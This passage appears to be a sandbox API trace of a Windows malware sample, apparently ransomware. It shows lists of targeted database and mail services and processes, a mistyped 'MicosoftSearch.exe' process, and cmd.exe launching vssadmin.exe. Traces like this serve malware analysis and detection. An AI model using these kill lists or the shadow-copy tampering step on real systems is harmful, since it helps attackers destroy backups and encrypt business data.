(lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0051.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0051.558] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0051.558] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0051.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0051.558] lstrlenW (lpString="SysMain") returned 7 [0051.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0051.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0051.558] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0051.558] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0051.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0051.558] lstrlenW (lpString="Themes") returned 6 [0051.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0051.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0051.558] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0051.558] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0051.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0051.558] lstrlenW (lpString="TrkWks") returned 6 [0051.558] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0051.558] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0051.558] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0051.558] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0051.558] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0051.558] lstrlenW (lpString="UxSms") returned 5 [0051.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0051.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0051.559] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0051.559] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0051.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0051.559] lstrlenW (lpString="VSS") returned 3 [0051.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0051.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0051.559] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0051.559] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0051.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0051.559] lstrlenW (lpString="WdiServiceHost") returned 14 [0051.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0051.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0051.559] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0051.559] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0051.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0051.559] lstrlenW (lpString="WdiSystemHost") returned 13 [0051.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0051.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0051.559] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0051.559] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0051.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0051.559] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0051.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0051.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0051.559] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0051.559] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0051.559] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0051.559] lstrlenW (lpString="Winmgmt") returned 7 [0051.559] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0051.559] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0051.559] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0051.560] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0051.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0051.560] lstrlenW (lpString="WPDBusEnum") returned 10 [0051.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0051.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0051.560] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0051.560] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0051.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0051.560] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc83f8 | out: hHeap=0xb10000) returned 1 [0051.560] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x194 [0051.562] Process32FirstW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0051.563] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0051.564] lstrlenW (lpString="System") returned 6 [0051.564] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0051.564] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0051.564] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0051.564] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0051.564] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0051.564] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0051.564] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0051.564] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0051.565] lstrlenW (lpString="smss.exe") returned 8 [0051.565] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0051.565] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0051.565] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0051.565] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0051.565] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0051.565] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0051.565] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0051.565] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.566] lstrlenW (lpString="csrss.exe") returned 9 [0051.566] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0051.566] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0051.566] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0051.566] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0051.566] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0051.566] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0051.566] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0051.566] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0051.567] lstrlenW (lpString="wininit.exe") returned 11 [0051.567] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0051.567] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0051.567] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0051.567] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.568] lstrlenW (lpString="csrss.exe") returned 9 [0051.568] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0051.568] lstrlenW (lpString="winlogon.exe") returned 12 [0051.568] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0051.569] lstrlenW (lpString="services.exe") returned 12 [0051.569] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0051.570] lstrlenW (lpString="lsass.exe") returned 9 [0051.570] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0051.571] lstrlenW (lpString="lsm.exe") returned 7 [0051.571] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.571] lstrlenW (lpString="svchost.exe") returned 11 [0051.571] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.572] lstrlenW (lpString="svchost.exe") returned 11 [0051.572] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.573] lstrlenW (lpString="svchost.exe") returned 11 [0051.573] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.574] lstrlenW (lpString="svchost.exe") returned 11 [0051.574] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.574] lstrlenW (lpString="svchost.exe") returned 11 [0051.575] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0051.575] lstrlenW (lpString="audiodg.exe") returned 11 [0051.576] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.576] lstrlenW (lpString="svchost.exe") returned 11 [0051.576] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.577] lstrlenW (lpString="svchost.exe") returned 11 [0051.577] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0051.578] lstrlenW (lpString="dwm.exe") returned 7 [0051.578] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0051.579] lstrlenW (lpString="explorer.exe") returned 12 [0051.579] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0051.579] lstrlenW (lpString="spoolsv.exe") returned 11 [0051.579] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0051.580] lstrlenW (lpString="taskhost.exe") returned 12 [0051.580] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.581] lstrlenW (lpString="svchost.exe") returned 11 [0051.581] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0051.582] lstrlenW (lpString="taskeng.exe") returned 11 [0051.582] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0051.582] lstrlenW (lpString="taskhost.exe") returned 12 [0051.583] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0051.583] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0051.583] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0051.584] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0051.584] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0051.585] lstrlenW (lpString="sa_shape.exe") returned 12 [0051.585] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0051.586] lstrlenW (lpString="confidence.exe") returned 14 [0051.586] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0051.586] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0051.586] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0051.587] lstrlenW (lpString="blue.exe") returned 8 [0051.588] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0051.589] lstrlenW (lpString="newly debut.exe") returned 15 [0051.589] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0051.589] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0051.590] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0051.590] lstrlenW (lpString="archive.exe") returned 11 [0051.590] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0052.350] lstrlenW (lpString="defend.exe") returned 10 [0052.356] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0052.357] lstrlenW (lpString="arservice.exe") returned 13 [0052.357] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0052.358] lstrlenW (lpString="rr-programmer.exe") returned 17 [0052.358] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0052.358] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0052.358] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0052.359] lstrlenW (lpString="twistedmonton.exe") returned 17 [0052.359] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0052.360] lstrlenW (lpString="arc plains.exe") returned 14 [0052.360] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0052.361] lstrlenW (lpString="americahousestip.exe") returned 20 [0052.361] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0052.362] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0052.362] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0052.362] lstrlenW (lpString="medical lectures.exe") returned 20 [0052.362] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0052.363] lstrlenW (lpString="electronic.exe") returned 14 [0052.363] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0052.364] lstrlenW (lpString="regression.exe") returned 14 [0052.364] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0052.365] lstrlenW (lpString="county.exe") returned 10 [0052.365] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0052.366] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0052.366] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0052.366] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0052.366] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0052.367] lstrlenW (lpString="cmd.exe") returned 7 [0052.367] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0052.368] lstrlenW (lpString="conhost.exe") returned 11 [0052.368] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0052.369] lstrlenW (lpString="vssadmin.exe") returned 12 [0052.369] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0052.370] lstrlenW (lpString="VSSVC.exe") returned 9 [0052.370] Process32NextW (in: hSnapshot=0x194, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, 